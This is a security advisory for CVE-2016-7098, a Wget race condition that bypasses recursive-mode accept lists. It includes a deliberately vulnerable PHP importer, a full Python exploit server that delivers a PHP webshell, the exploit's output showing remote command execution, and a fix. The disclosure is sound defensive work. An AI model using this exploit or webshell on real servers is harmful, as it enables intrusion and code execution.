GNU Wget Access List Bypass / Race Condition

GNU wget versions 1.17 and earlier, when used in mirroring/recursive mode, are affected by a race condition vulnerability that might allow remote attackers to bypass intended wget access list restrictions specified with the -A parameter. This might allow attackers to place malicious/restricted files onto the system. Depending on the application / download directory, this could potentially lead to other vulnerabilities such as code execution, etc.


MD5 | 3a7f82b9aec2e988d5b1a8143090c82b

    __                     __   __  __           __                 
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/


=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2016-7098
- Release date: 24.11.2016
- Revision 1.0
- Severity: Medium
=============================================


I. VULNERABILITY
-------------------------

GNU Wget < 1.18 Access List Bypass / Race Condition


II. BACKGROUND
-------------------------

"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and
FTP, the most widely-used Internet protocols.
It is a non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc.

GNU Wget has many features to make retrieving large files or mirroring entire
web or FTP sites easy
"

https://www.gnu.org/software/wget/


III. INTRODUCTION
-------------------------

GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode,
is affected by a Race Condition vulnerability that might allow remote attackers
to bypass intended wget access list restrictions specified with -A parameter.
This might allow attackers to place malicious/restricted files onto the system.
Depending on the application / download directory, this could potentially lead
to other vulnerabilities such as code execution etc.


IV. DESCRIPTION
-------------------------

When wget is used in recursive/mirroring mode, according to the manual it can
take the following access list options:

"Recursive Accept/Reject Options:
-A acclist --accept acclist
-R rejlist --reject rejlist

Specify comma-separated lists of file name suffixes or patterns to accept or
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in
an element of acclist or rejlist, it will be treated as a pattern, rather
than a suffix."


These can for example be used to only download JPG images.

It was however discovered that when a single file is requested with recursive
option (-r / -m) and an access list ( -A ), wget only applies the checks at the
end of the download process.

This can be observed in the output below:

# wget -r -nH -A '*.jpg' http://attackersvr/test.php
Resolving attackersvr... 192.168.57.1
Connecting to attackersvr|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: AC/a!Etest.phpAC/a!aC/

15:05:46 (27.3 B/s) - AC/a!Etest.phpAC/a!aC/ saved [52]

Removing test.php since it should be rejected.

FINISHED


Although wget deletes the file at the end of the download process, this creates
a race condition as an attacker with control over the URL/remote server could
intentionally slow down the download process so that they had a chance to make
use of the malicious file before it gets deleted.

It is very easy to win the race as the file only gets deleted after the HTTP
connection is terminated. The attacker could therefore keep the connection open
as long as it was necessary to make use of the uploaded file as demonstrated
in the proof of concept below.


V. PROOF OF CONCEPT EXPLOIT
------------------------------


Here is a simple vulnerable PHP web application that uses wget to download
images from a user-provided server/URL:


---[ image_importer.php ]---

<?php
// Vulnerable webapp [image_importer.php]
// Uses wget to import user images from provided site URL
// It only accepts JPG files (-A wget option).

if ( isset($_GET['imgurl']) ) {
$URL = escapeshellarg($_GET['imgurl']);
} else {
die("imgurl parameter missing");
}

if ( !file_exists("image_uploads") ) {
mkdir("image_uploads");
}

// Download user JPG images into /image_uploads directory
system("wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1");
?>


----------------------------


For example:
https://victimsvr/image_importer.php?imgurl= href="http://images/logo.jpg">http://images/logo.jpg

will cause wget to upload logo.jpg file into:
https://victimsvr/images_uploads/logo.jpg

The wget access list (-A) is to ensure that only .jpg files get uploaded.

However due to the wget race condition vulnerability an attacker could use
the exploit below to upload an arbitrary PHP script to /image_uploads directory
and achieve code execution.


---[ wget-race-exploit.py ]---

#!/usr/bin/env python

#
# Wget < 1.18 Access List Bypass / Race Condition PoC Exploit
# CVE-2016-7098
#
# Dawid Golunski
# https://legalhackers.com
#
#
# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
# file for long enough to take advantage of it.
# The exploit sets up a web server on port 80 and waits for a download request from wget.
# It then supplies a PHP webshell payload and requests the uploaded file before it gets
# removed by wget.
#
# Adjust target URL (WEBSHELL_URL) before executing.
#
# Full advisory at:
#
# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
#
# Disclaimer:
#
# For testing purposes only. Do no harm.
#
#

import SimpleHTTPServer
import time
import SocketServer
import urllib2
import sys

HTTP_LISTEN_IP = '0.0.0.0'
HTTP_LISTEN_PORT = 80

PAYLOAD='''
<?php
//our webshell
system($_GET["cmd"]);
system("touch /tmp/wgethack");
?>
'''

# Webshell URL to be requested before the connection is closed
# i.e before the uploaded "temporary" file gets removed.
WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"

# Command to be executed through 'cmd' GET paramter of the webshell
CMD="/usr/bin/id"


class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# Send the payload on GET request
print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(PAYLOAD)
print "\n[+] PHP webshell payload was sent.\n"

# Wait for the file to be flushed to disk on remote host etc.
print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
time.sleep(2)

# Request uploaded webshell
print "[+} File '" + self.path + "' should be saved by now :)\n"
print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
print "[+} Command result: "
print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()

print "[+} All done. Closing HTTP connection...\n"
# Connection will be closed on request handler return
return

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT

handler.serve_forever()


------------------------------



If the attacker run this exploit on their server ('attackersver') and pointed
the vulnerable script image_importer.php at it via URL:

https://victimsvr/image_importer.php?imgurl= href="http://attackersvr/webshell.php">http://attackersvr/webshell.php

The attacker will see output similar to:



root@attackersvr:~# ./wget-race-exploit.py

Wget < 1.18 Access List Bypass / Race Condition PoC Exploit
CVE-2016-7098

Dawid Golunski
https://legalhackers.com

[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...

[+] Got connection from wget requesting /webshell.php via GET :)

victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 -

[+] PHP webshell payload was sent.

[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...

[+} File '/webshell.php' should be saved by now :)

[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id

[+} Command result:

uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)

[+} All done. Closing HTTP connection...



VI. BUSINESS IMPACT
-------------------------

The vulnerability might allow remote servers to bypass intended wget access list
restrictions to temporarily store a malicious file on the server.
In certain cases, depending on the context wget command was used in and download
path, this issue could potentially lead to other vulnerabilities such as
script execution as shown in the PoC section.

VII. SYSTEMS AFFECTED
-------------------------

Wget < 1.18

VIII. SOLUTION
-------------------------

Update to latest version of wget 1.18 or apply patches provided by the vendor.

IX. REFERENCES
-------------------------

https://legalhackers.com

https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html

https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py

https://www.gnu.org/software/wget/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098

https://security-tracker.debian.org/tracker/CVE-2016-7098

http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html

http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com

XI. REVISION HISTORY
-------------------------

24.11.2016 - Advisory released

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.


Related Posts